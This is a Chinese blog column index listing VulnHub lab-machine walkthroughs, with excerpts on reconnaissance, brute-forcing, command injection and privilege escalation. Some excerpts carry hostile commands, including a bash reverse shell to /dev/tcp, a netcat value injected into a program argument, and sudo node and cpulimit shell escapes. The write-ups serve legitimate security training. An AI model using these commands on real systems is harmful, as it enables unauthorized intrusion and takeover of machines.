VulnHub
文章平均质量分 78
不会PWN不改名
这个作者很懒,什么都没留下…
展开
-
Vulnhub靶机随笔-Hacksudo_Aliens
5.通过phpmyadmin登录mysql.进入数据库,我第一步去看了一眼user表,发现root用户和vishal用户加密过的密码一致,于是我退出当前登录,登上了root用户,这一步是考虑到可能存在权限的问题,为后面做铺垫,用不上也无所谓。再回到cpulimit提权的命令,就显然易见了,通过具有suid权限的cpulimit将执行/bin/sh的cpu使用率调至100%,也就是强制让电脑一心一意执行/bin/sh。靶机开放三个端口,22ssh端口,80web端口,9000是数据库图形化界面。原创 2024-05-10 19:02:45 · 583 阅读 · 0 评论 -
Vulnhub靶机随笔-CYNIX_1
3.我们copy一下URL,打开开发者模式(F12),在网页瞎点点,果真在先生的头部存在一个按钮,只不过被设置了透明,我们将其显现出来:将框框里的参数改为1.0即可。5.好像被过滤掉了,既然他不仁也不能怪我们不义,直接绕过,最简单的当然是上fuzz字典去爆破,我这里是误打误撞,碰到了a就被我绕过了O.o。8.这可不是我画出来的,学过html的同学一眼就能看出这里面暗藏玄机,没学过的同学也没事,看下一张图片。我说我眼神不好,没意见吧,了解lxc,lxd,docker容器的,可能会更明白一点。原创 2024-05-08 19:49:12 · 1537 阅读 · 0 评论 -
Vulnhub靶机随笔-Thr0ll
通过nmap我们扫描到靶机开放了21ftp端口,22ssh端口以及80web端口,且ftp允许匿名用户(anonymous)登录,网站存在robots协议,以及几个子目录。这个37292.c的脚本 太符合要求了,so直接拷贝到靶机上,这里我是将当前目录发布出去,靶机wget下载,gcc编译一下,直接获取到root权限,豪取flag。==匿名登陆ftp服务,发现存在一个lol.pcap流量包,我们将其down下来,利用wireshark打开,寻找新的有利信息。靶机 IP:未知 系统:未知。原创 2024-04-22 18:51:30 · 354 阅读 · 0 评论 -
Vulnhub靶机随笔-BOREDHACKERBLOG: CLOUD AV
我的命令: ./update_cloudav "3 |nc 192.168.3.44 7777 |/bin/bash |nc 192.168.3.44 9999”我用的命令: cat | echo 'bash -i >& /dev/tcp/192.168.3.44/4444 0>&1'|bash。命令: cat | echo 'bash -i >& /dev/tcp/攻击机IP/攻击机开放port 0>&1'|bash。2.别放弃,继续挨个翻目录文件,在/home/scanner下有几个特殊文件。原创 2024-04-08 16:11:08 · 1463 阅读 · 2 评论 -
Vulnhub靶机随笔-Jangow 1.0.1
C.提权 内核提权 第三步 通过SCP将45010.c文件从Linux中传输到物理机中在Windows的cmd中输入下方命令 这里需要将ssh的配置文件更改为允许root登录命令: scp root@攻击机IP:文件所在位置 ./ 第五步 通过gcc编译45010.c文件命令: gcc 45010.c -o exp 这里不用加-c参数原创 2024-03-21 16:42:37 · 630 阅读 · 0 评论 -
Vulnhub靶机随笔-OS-ByteSec
咱们继续,这里又要用到一种提权姿势PATH提权PATH是Linux和类Unix操作系统中的环境变量,它指定可执行程序的所有bin和sbin存储目录。当用户在终端上运行任何命令时,它会向shell发送请求以在PATH变量中搜索可执行文件来响应用户执行的命令。超级用户通常还可以使用/sbin和/usr/sbin以便于执行系统管理的命令。原创 2024-03-11 17:15:48 · 859 阅读 · 1 评论 -
Vulnhub靶机随笔-Chronos
我们可以利用node,node就是类似于java语言的开发环境,我们平常写的是python反弹shell,今天写一个java的反弹shell命令: sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0,1,2]})'原创 2024-03-07 15:44:08 · 848 阅读 · 2 评论 -
Vulnhub靶机随笔-DC-6
可以发现,当前用户graham可以以jens的身份去运行backups.sh脚本,那么很简单了,我们可以把”/bin/bash”写入到backups.sh中,在运行就可以获取shell。到这,肯定有很多小伙伴发现DC系列都是老套路,或许有的直接上手wpscan去找用户名以及密码,然后登陆一个wp-admin的网址,没问题,都是对的。紧接着,咱们把这五个用户名写入user.txt,再使用wpscan去获取密码,好像右绕回来了,还是离不开wpscan,确实是个好工具。速度也很快,大约半分钟,获取5个用户名。原创 2023-11-21 12:23:46 · 81 阅读 · 0 评论 -
Vulnhub靶机随笔-JIS-CTF
渗透机:Kali IP:192.168.3.19 靶机:JIS-CTF IP:未知。原创 2023-10-30 19:20:55 · 124 阅读 · 1 评论 -
Vulnhub靶场随笔-Funbox1
得到两个用户,admin和joe,继续暴力获取密码,这里有两张方法第一种使用wpscan,命令: wpscan --url http://funbox.fritz.box -U joe --passwords rockyou.txt原创 2023-10-26 00:38:06 · 95 阅读 · 0 评论 -
Vulnhub靶场随笔HA:Narak
咱们提权还有一个方法,老生常谈了属于是内核漏洞提权CVE-2021-3493 /etc/update-motd.d/00-header原创 2023-10-23 21:05:25 · 82 阅读 · 0 评论 -
Vlunhub靶场随笔-The Plants Mercury
john。原创 2023-10-18 21:52:46 · 57 阅读 · 1 评论 -
Vulnhub靶场随笔-Driftingblues4
确定靶机存活性 这里使用的是netdiscover 扫描靶机开放端口版本服务信息存在21ftp端口,尝试匿名登陆 Failed,服务器做了加固 另辟蹊径,访问网站 网站这里有个密文,疑似base64加密的 解密 这里用的是burp自带的模块 这不套娃嘛,继续解 Continue 复制到url里头访问下 妥妥的BrainFuck编码(在线解密网址: CTF在线工具-在线Brainfuck加密|在线Brain原创 2023-10-16 23:05:42 · 53 阅读 · 1 评论 -
VulnHub靶场随笔-DC-4
VulnHub靶场随笔-DC-4原创 2023-10-10 21:43:59 · 42 阅读 · 1 评论 -
VulnHub靶场随笔-Me and my girlfriend
page=profile&user_id=12可进行修改得到其他表单,最终尝试alice所在页面id为5,f12查看到alice的密码。##每次都需要对抓取的数据包增添”x-forwarded-for:127.0.0.1”,并点击forward。12.查看家目录下文件以及隐藏文件,发现flag1,并且得到提示让我们提权获取第二个flag。5.浏览器访问10.20.91.38,看到提示用本地登录,f12查看到提示信息。11.尝试进行撞库 通过ssh发现能远程登录alice,1.查一下本地IP地址。原创 2023-03-31 10:54:50 · 57 阅读 · 0 评论 -
VulnHub靶场随笔-DC -1
1.查看攻击机(kali)ip地址 #ip a2.查看网段主机存活数 #nmap -sn 192.168.57.0/243.查看靶机开放端口以及服务版本信息 #nmap -p- -sV 192.168.57.1544.登录网站,猜测存在drupal漏洞5.启动msfconsole,寻找漏洞 #msfconsole #search drupal6.使用选项1模块(测试得出),列出参数选项信息原创 2023-03-31 10:54:28 · 64 阅读 · 0 评论 -
VulnHub靶场随笔-LAMPIAO
9.登录并查找数据库,发现账户名密码,猜测靶机上有一个账户也是tiago,密码也为Virgulino。10.查看/etc/passwd,验证了猜想,成功通过ssh连接靶机。6.启动metaspolit模块,寻找drupal漏洞。2.网站结构是drupal 7版本,1.1898端口是httpd服务。4.综合扫描靶机全端口以及服务版本信息。5.访问网页,发现并无sql注入点。3.扫描端口,判断靶机是哪一台。8.进入shell,搜索信息。挨个查看后,发现数据库信息。7.利用漏洞,进行攻击。原创 2023-03-31 10:51:37 · 57 阅读 · 0 评论